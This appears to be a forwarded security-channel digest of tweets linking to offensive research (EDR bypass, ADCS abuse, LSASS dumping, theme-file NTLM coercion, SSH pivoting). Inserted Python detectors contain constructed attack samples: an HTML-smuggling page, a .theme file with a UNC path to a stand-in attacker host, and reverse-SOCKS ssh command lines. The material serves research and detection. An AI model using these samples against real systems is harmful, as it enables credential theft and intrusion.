Forwarded from Внутрянка
Material on pentesting 1C
Ardent101
Once more about pentesting 1C
Introduction. This material consists largely of publicly available work by other people. The goal was to test that work in practice and collect the results in one place. That is what explains the title of the article.
I'll continue the reasoning…
😈 [ Grzegorz Tworek @0gtweet ]
Eliminate a huge part of lateral movement scenarios with one command:
reg.exe add HKLM\SYSTEM\CurrentControlSet\Control /v DisableRemoteScmEndpoints /t REG_DWORD /d 1
It will make the Service Control Manager deaf to remote management. Everything else works properly.
🐥 [ tweet ]
😈 [ Winslow @senzee1984 ]
MutationGate is a new approach to bypass EDR's inline hooking by replacing an unhooked NTAPI's SSN with a hooked NTAPI's SSN at run time with a hardware breakpoint.
🔗 https://winslow1984.com/books/malware/page/mutationgate
🔗 https://github.com/senzee1984/MutationGate
🐥 [ tweet ]
😈 [ Jonas Bülow Knudsen @Jonas_B_K ]
Wrote another blog post about yet another ADCS abuse technique. This one is about explicit certificate mapping 📌📃🗺️
🔗 https://medium.com/specter-ops-posts/adcs-esc14-abuse-technique-333a004dc2b9
🐥 [ tweet ]
😈 [ Austin Hudson @ilove2pwn_ ]
"A Summary of Memory Obfuscation & Building Chains": A simple blog post that highlights the two concepts that I utilize to my advantage.
🔗 https://suspicious.actor/misc/2024/02/29/memory-obfuscation-tldr.html
🐥 [ tweet ]
😈 [ blackorbird @blackorbird ]
#Lazarus exploited a flaw in the Windows AppLocker driver (appid.sys) as a zero-day to gain kernel-level access and turn off security tools. CVE-2024-21338
Beyond BYOVD with an Admin-to-Kernel Zero-Day
🔗 https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/
🐥 [ tweet ]
😈 [ CODE WHITE GmbH @codewhitesec ]
Struggling to get those precious certificates with #certipy and AD CS instances that do not support web enrollment and do not expose CertSvc via RPC? @qtc_de has you covered and added functionality to use DCOM instead of good old RPC #redteaming
🔗 https://github.com/ly4k/Certipy/pull/201
🐥 [ tweet ]
😈 [ Grzegorz Tworek @0gtweet ]
Writable SYSVOL --> Domain Admin:
🔗 http://x.com/i/article/1763673505873240064
🐥 [ tweet ]
😈 [ Ninad Mishra @NinadMishra5 ]
Nice blog about Recon Automation using tools like Subfinder, Chaos, Nuclei, Httpx, Notify, and Anew to find bugs and vulnerabilities.
🔗 https://dhiyaneshgeek.github.io/bug/bounty/2020/02/06/recon-with-me/
🐥 [ tweet ]
😈 [ zimnyaa @zimnyaatishina ]
I’ve tried replicating some basic AD techniques in FreeIPA:
There’s still a lot to explore, so I’ll return to it at some point in the future.
🔗 https://tishina.in/ops/freeipa-postexploitation
🐥 [ tweet ]
😈 [ Thorsten E. @endi24 ]
Script to perform some hardening of Windows OS
by @mackwage
🔗 https://gist.github.com/mackwage/08604751462126599d7e52f233490efe
🐥 [ tweet ]
😈 [ Octoberfest7 @Octoberfest73 ]
Check out my latest blog post released during my internship at @RedSiege where I explore how a method for dumping LSASS popularized in 2019 can avoid detection by Microsoft Defender for Endpoint in 2024:
🔗 https://redsiege.com/blog/2024/03/dumping-lsass-like-its-2019/
🐥 [ tweet ]
😈 [ delivr.to @delivr_to ]
A fresh take on traditional HTML smuggling techniques - Rust-based WebAssembly payloads that can call native JavaScript functions 👀
Read our latest blog for code examples, delivr.to payloads and detection rules:
🔗 https://blog.delivr.to/webassembly-smuggling-it-wasmt-me-648a62547ff4
🐥 [ tweet ]
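An added example, not code from the delivr.to blog or the original post: a Python triage check for an HTML page that smuggles a WebAssembly payload. Rather than keyword-matching alone, it decodes every quoted base64 literal and looks for the WebAssembly module magic (`\0asm`), then combines that with the JavaScript glue a smuggling page needs (`WebAssembly.instantiate`, `Blob`/`createObjectURL`, a `download` attribute). Both HTML samples are constructed here; the "payload" is only the 8-byte module header, and the verdict thresholds are an assumption.

```python
import base64
import binascii
import re

WASM_MAGIC = b"\x00asm"  # first four bytes of every WebAssembly module

# Constructed sample page: base64 is just the 8-byte wasm header, not a real payload.
SMUGGLING_HTML = """<html><body><script>
const blob64 = "AGFzbQEAAAA=";
const bytes = Uint8Array.from(atob(blob64), c => c.charCodeAt(0));
let mem;
WebAssembly.instantiate(bytes, { env: { drop: (p, n) => {
  const b = new Blob([new Uint8Array(mem.buffer, p, n)], {type: "application/octet-stream"});
  const a = document.createElement("a"); a.href = URL.createObjectURL(b); a.download = "invoice.iso"; a.click();
}}}).then(m => { mem = m.instance.exports.memory; m.instance.exports.run(); });
</script></body></html>"""

# Constructed benign page: an inline PNG data URI, no wasm, no download glue.
BENIGN_HTML = """<html><body><script>
fetch("/api/items").then(r => r.json()).then(render);
</script><img src="data:image/png;base64,iVBORw0KGgo="></body></html>"""

# A quoted string made only of base64 alphabet characters (8+ chars, optional padding).
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{8,}={0,2})["\']')

# JavaScript glue typically present in an HTML smuggling page.
GLUE = {
    "wasm_instantiate": re.compile(r"WebAssembly\.(instantiate|instantiateStreaming|compile)"),
    "blob_download": re.compile(r"createObjectURL|\.download\s*=|new Blob\("),
    "base64_decode": re.compile(r"\batob\("),
}


def embedded_wasm_modules(html):
    """Return the base64 literals in the page that decode to a WebAssembly module."""
    found = []
    for m in B64_LITERAL.finditer(html):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except (ValueError, binascii.Error):
            continue
        if raw.startswith(WASM_MAGIC):
            found.append(m.group(1))
    return found


def score_html(html):
    """Combine decoded-module evidence with the JS glue into a verdict (thresholds assumed)."""
    indicators = [name for name, rx in GLUE.items() if rx.search(html)]
    modules = embedded_wasm_modules(html)
    if modules:
        indicators.append("inline_wasm_module")
    if modules and "blob_download" in indicators:
        verdict = "smuggling"       # a module in the page plus a way to write a file to disk
    elif modules or len(indicators) >= 2:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": indicators, "wasm_modules": len(modules)}


if __name__ == "__main__":
    for name, page in (("smuggling", SMUGGLING_HTML), ("benign", BENIGN_HTML)):
        print(name, score_html(page))
```

Decoding the literal and checking the magic is what makes this hold up against trivial renaming of the JavaScript; a payload split across several literals or decoded through something other than a plain base64 string would need the decode step extended.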
😈 [ Theori @theori_io ]
Do you use a virtual machine to browse dangerous links safely? If you use the Chrome browser inside that virtual machine, is it secure enough?
As you might have guessed, the answer is not so much.
We chained six unique CVEs from 2023 listed below.
• Chrome Renderer RCE: CVE-2023-3079
• Chrome Sandbox Escape: CVE-2023-21674
• LPE in guest OS: CVE-2023-29360
• VMware Info Leak: CVE-2023-34044
• VMware Escape: CVE-2023-20869
• LPE in host OS: CVE-2023-36802
Over the next few weeks, we will be releasing the detailed analysis write-ups on each vulnerability used in this chain on our blog.
All of these CVEs are featured in Fermium-252, our Cyber Threat Intelligence Database Platform.
You can check out the information about Fermium-252 on our website and blog post:
🔗 https://theori.io/service/vr#fermium
🔗 https://blog.theori.io/fermium-252-the-cyber-threat-intelligence-database-b30ce06e7c5e?source=social.tw
🐥 [ tweet ]
😈 [ n0km @n0km ]
New examples GetADComputers.py and readLAPS.py are now merged in impacket's master branch. Go check them out. Thanks F-Masood
🔗 https://github.com/fortra/impacket/pull/1673
🐥 [ tweet ]
Forwarded from PT SWARM
🎁 Source Code Disclosure in IIS 10.0! Almost.
There is a method to reveal the source code of some .NET apps. Here's how it works.
👉 https://swarm.ptsecurity.com/source-code-disclosure-in-asp-net-apps/
😈 [ SEKTOR7 Institute @SEKTOR7net ]
Wondering what telemetry an EDR collects?
Wonder no more! @Kostastsale and @ateixei run an EDR Telemetry Project, covering all major EDRs:
"The main goal of the EDR Telemetry project is to encourage EDR vendors to be more transparent about the telemetry they provide".
Blog:
🔗 https://detect.fyi/edr-telemetry-project-a-comprehensive-comparison-d5ed1745384b
Table:
🔗 https://docs.google.com/spreadsheets/d/1ZMFrD6F6tvPtf_8McC-kWrNBBec_6Si3NW6AoWf3Kbg/edit?usp=sharing
Github:
🔗 https://github.com/tsale/EDR-Telemetry
🐥 [ tweet ]
😈 [ Akamai Security Intelligence Group @akamai_research ]
Today’s Theme is vulnerability 👀
Akamai researchers have discovered a vuln in Windows Themes that can trigger an authentication coercion - with almost zero user interaction.
User views the file, Explorer sends SMB packets with credentials.
Full post:
🔗 https://www.akamai.com/blog/security-research/2024/mar/leaking-ntlm-credentials-through-windows-themes
🐥 [ tweet ]
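As an added example, not code from the Akamai write-up or the original post: a small Python scanner that flags .theme files whose image references are UNC paths, which is the condition under which Explorer reaches out over SMB (and authenticates) when the file is viewed. The two .theme samples are constructed; the set of path-valued keys it checks (`BrandImage`, `Wallpaper`, `Path`, `DefaultValue`) is an assumption about where such references can appear and can be extended.

```python
import configparser
import re
from typing import Dict, List

# Constructed sample .theme files for illustration; not real artifacts.
# .theme files are INI-style, and Explorer resolves the image paths in them when the
# theme is displayed, so a UNC path here is what drives the outbound SMB connection.
BENIGN_THEME = """[Theme]
DisplayName=Corporate Blue
BrandImage=%SystemRoot%\\Web\\Wallpaper\\Windows\\img0.jpg

[Control Panel\\Desktop]
Wallpaper=C:\\Users\\Public\\Pictures\\desktop.jpg
"""

COERCING_THEME = """[Theme]
DisplayName=Quarterly Report
BrandImage=\\\\10.0.0.5\\share\\brand.png

[Control Panel\\Desktop]
Wallpaper=\\\\attacker.example\\wallpapers\\wp.jpg
"""

# \\host\share\... or //host/share/...
UNC_RE = re.compile(r"^\s*(?:\\\\|//)(?P<host>[^\\/]+)[\\/]")

# Keys whose values are paths Explorer will resolve (assumed list; extend as needed).
PATH_KEYS = {"brandimage", "wallpaper", "path", "defaultvalue"}


def _parse(theme_text: str) -> configparser.RawConfigParser:
    # RawConfigParser: no % interpolation, so %SystemRoot% style values parse untouched.
    parser = configparser.RawConfigParser(strict=False, interpolation=None)
    parser.optionxform = str.lower  # .theme keys are case-insensitive
    parser.read_string(theme_text)
    return parser


def find_unc_refs(theme_text: str) -> List[Dict[str, str]]:
    """Return every path-valued key whose value is a UNC path, with the target host."""
    hits = []
    parser = _parse(theme_text)
    for section in parser.sections():
        for key, value in parser.items(section):
            m = UNC_RE.match(value)
            if key in PATH_KEYS and m:
                hits.append({"section": section, "key": key,
                             "host": m.group("host"), "value": value.strip()})
    return hits


def coercion_hosts(theme_text: str) -> List[str]:
    """Distinct hosts the theme would make Explorer connect to (useful for blocking)."""
    return sorted({h["host"] for h in find_unc_refs(theme_text)})


def is_coercing(theme_text: str) -> bool:
    return bool(find_unc_refs(theme_text))


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        for hit in find_unc_refs(text):
            print(f"{path}: [{hit['section']}] {hit['key']} -> {hit['value']}")
```

Run it over attachments at a mail gateway or over a share of user-supplied files; the host list it returns is also what you would feed a perimeter block of outbound SMB (TCP 445) to hosts you do not own.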
😈 [ Pen Test Partners @PenTestPartners ]
SSH Split Tunnelling attacks are not new, but with so many organisations still using the MS native SSH client they can be deadly effective, if all the holes in the cheese line up. It needs minimal setup and reduces the likelihood of Blue team detection.
🔗 https://www.pentestpartners.com/security-blog/living-off-the-land-with-native-ssh-and-split-tunnelling/
🐥 [ tweet ]
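An added example that is not from the Pen Test Partners post: detection logic in Python run over constructed process-creation command lines (the CommandLine field of a Sysmon Event ID 1 or Security 4688 record), flagging ssh.exe invocations that set up port forwarding. A reverse dynamic forward (`-R port` with no target, the SOCKS pivot a split-tunnel setup relies on) and `-D` are rated highest; `-N` and `-f` are recorded as supporting evidence. The sample command lines and the severity scheme are assumptions; the option letters are OpenSSH's.

```python
import shlex
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple

# Constructed process-creation command lines; not real telemetry.
SAMPLE_EVENTS = [
    r'"C:\Windows\System32\OpenSSH\ssh.exe" -o StrictHostKeyChecking=no -N -R 1080 ops@203.0.113.7',
    r'"C:\Windows\System32\OpenSSH\ssh.exe" admin@build01.corp.example',
    r'"C:\Windows\System32\OpenSSH\ssh.exe" -D 9050 -fN -i C:\Users\j\.ssh\id_ed25519 user@203.0.113.7',
    r'"C:\Windows\System32\OpenSSH\ssh.exe" -L 3389:dc01:3389 user@jump.corp.example',
    r'"C:\Program Files\Git\usr\bin\ssh.exe" -T git@github.com',
]

# Single-letter OpenSSH options that consume a value (per ssh(1)); assumed complete for this purpose.
ARG_FLAGS = set("BbcDEeFIiJLlmOopQRSWw")
FORWARD_FLAGS = {"R": "remote forward", "D": "dynamic SOCKS", "L": "local forward", "w": "tun device"}


@dataclass
class SshInvocation:
    exe: str
    forwards: List[Tuple[str, str]] = field(default_factory=list)  # (flag letter, value)
    switches: Set[str] = field(default_factory=set)                 # boolean flags: N, f, T, ...
    host: Optional[str] = None


@dataclass
class Finding:
    index: int
    severity: str
    host: Optional[str]
    reasons: List[str]


def parse_ssh(cmdline: str) -> Optional[SshInvocation]:
    """Tokenise a Windows ssh.exe command line; returns None for any other binary."""
    tokens = shlex.split(cmdline, posix=False)  # non-POSIX: backslashes kept, quotes retained
    if not tokens:
        return None
    exe = tokens[0].strip('"')
    if exe.lower().rsplit("\\", 1)[-1] != "ssh.exe":
        return None
    inv = SshInvocation(exe=exe)
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-") and len(tok) > 1:
            letter = tok[1]
            if letter in ARG_FLAGS:
                # value is attached (-R1080) or the next token (-R 1080)
                if len(tok) > 2:
                    value = tok[2:]
                else:
                    i += 1
                    value = tokens[i] if i < len(tokens) else ""
                if letter in FORWARD_FLAGS:
                    inv.forwards.append((letter, value))
            else:
                inv.switches.update(tok[1:])  # combined switches such as -fN
        elif inv.host is None:
            inv.host = tok.split("@", 1)[-1]  # first non-option token is [user@]host
        i += 1
    return inv


def assess(index: int, inv: SshInvocation) -> Optional[Finding]:
    """Rate an invocation; only forwarding sessions produce a finding (scheme assumed)."""
    if not inv.forwards:
        return None
    reasons, severity = [], "medium"
    for flag, value in inv.forwards:
        reasons.append(f"-{flag} {value} ({FORWARD_FLAGS[flag]})")
        # "-R port" or "-R bind:port" without a target is a reverse dynamic forward:
        # the remote end gets a SOCKS proxy into this host's networks.
        if flag == "R" and value.count(":") < 2:
            reasons.append("reverse dynamic forward: SOCKS pivot into the client's network")
            severity = "high"
        if flag == "D":
            severity = "high"
    if "N" in inv.switches:
        reasons.append("-N: no remote command, tunnel-only session")
    if "f" in inv.switches:
        reasons.append("-f: backgrounded after authentication")
    return Finding(index, severity, inv.host, reasons)


def scan(cmdlines: List[str]) -> List[Finding]:
    findings = []
    for idx, cmd in enumerate(cmdlines):
        inv = parse_ssh(cmd)
        if inv is not None:
            f = assess(idx, inv)
            if f is not None:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] event {f.index} -> {f.host}: " + "; ".join(f.reasons))
```

Pair the command-line match with the network side: an ssh.exe process holding a long-lived outbound connection to an address outside your SSH bastion list is the second half of the signal, and the destination host from the finding is what you would check that against.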
😈 [ Winslow @senzee1984 ]
My new article revisits the classic technique Reflective Loading, and explains my tool InflativeLoading.
🔗 https://winslow1984.com/books/malware/page/reflectiveloading-and-inflativeloading
Thanks to @0xBoku @MalDevAcademy @stephenfewer @hasherezade and all other authors (and their articles/tools/projects) for the inspiration and help.
🐥 [ tweet ]
😈 [ Rasta Mouse @_RastaMouse ]
[BLOG]
Small experiment with using YARP as a C2 redirector.
🔗 https://rastamouse.me/yarp-as-a-c2-redirector/
🐥 [ tweet ]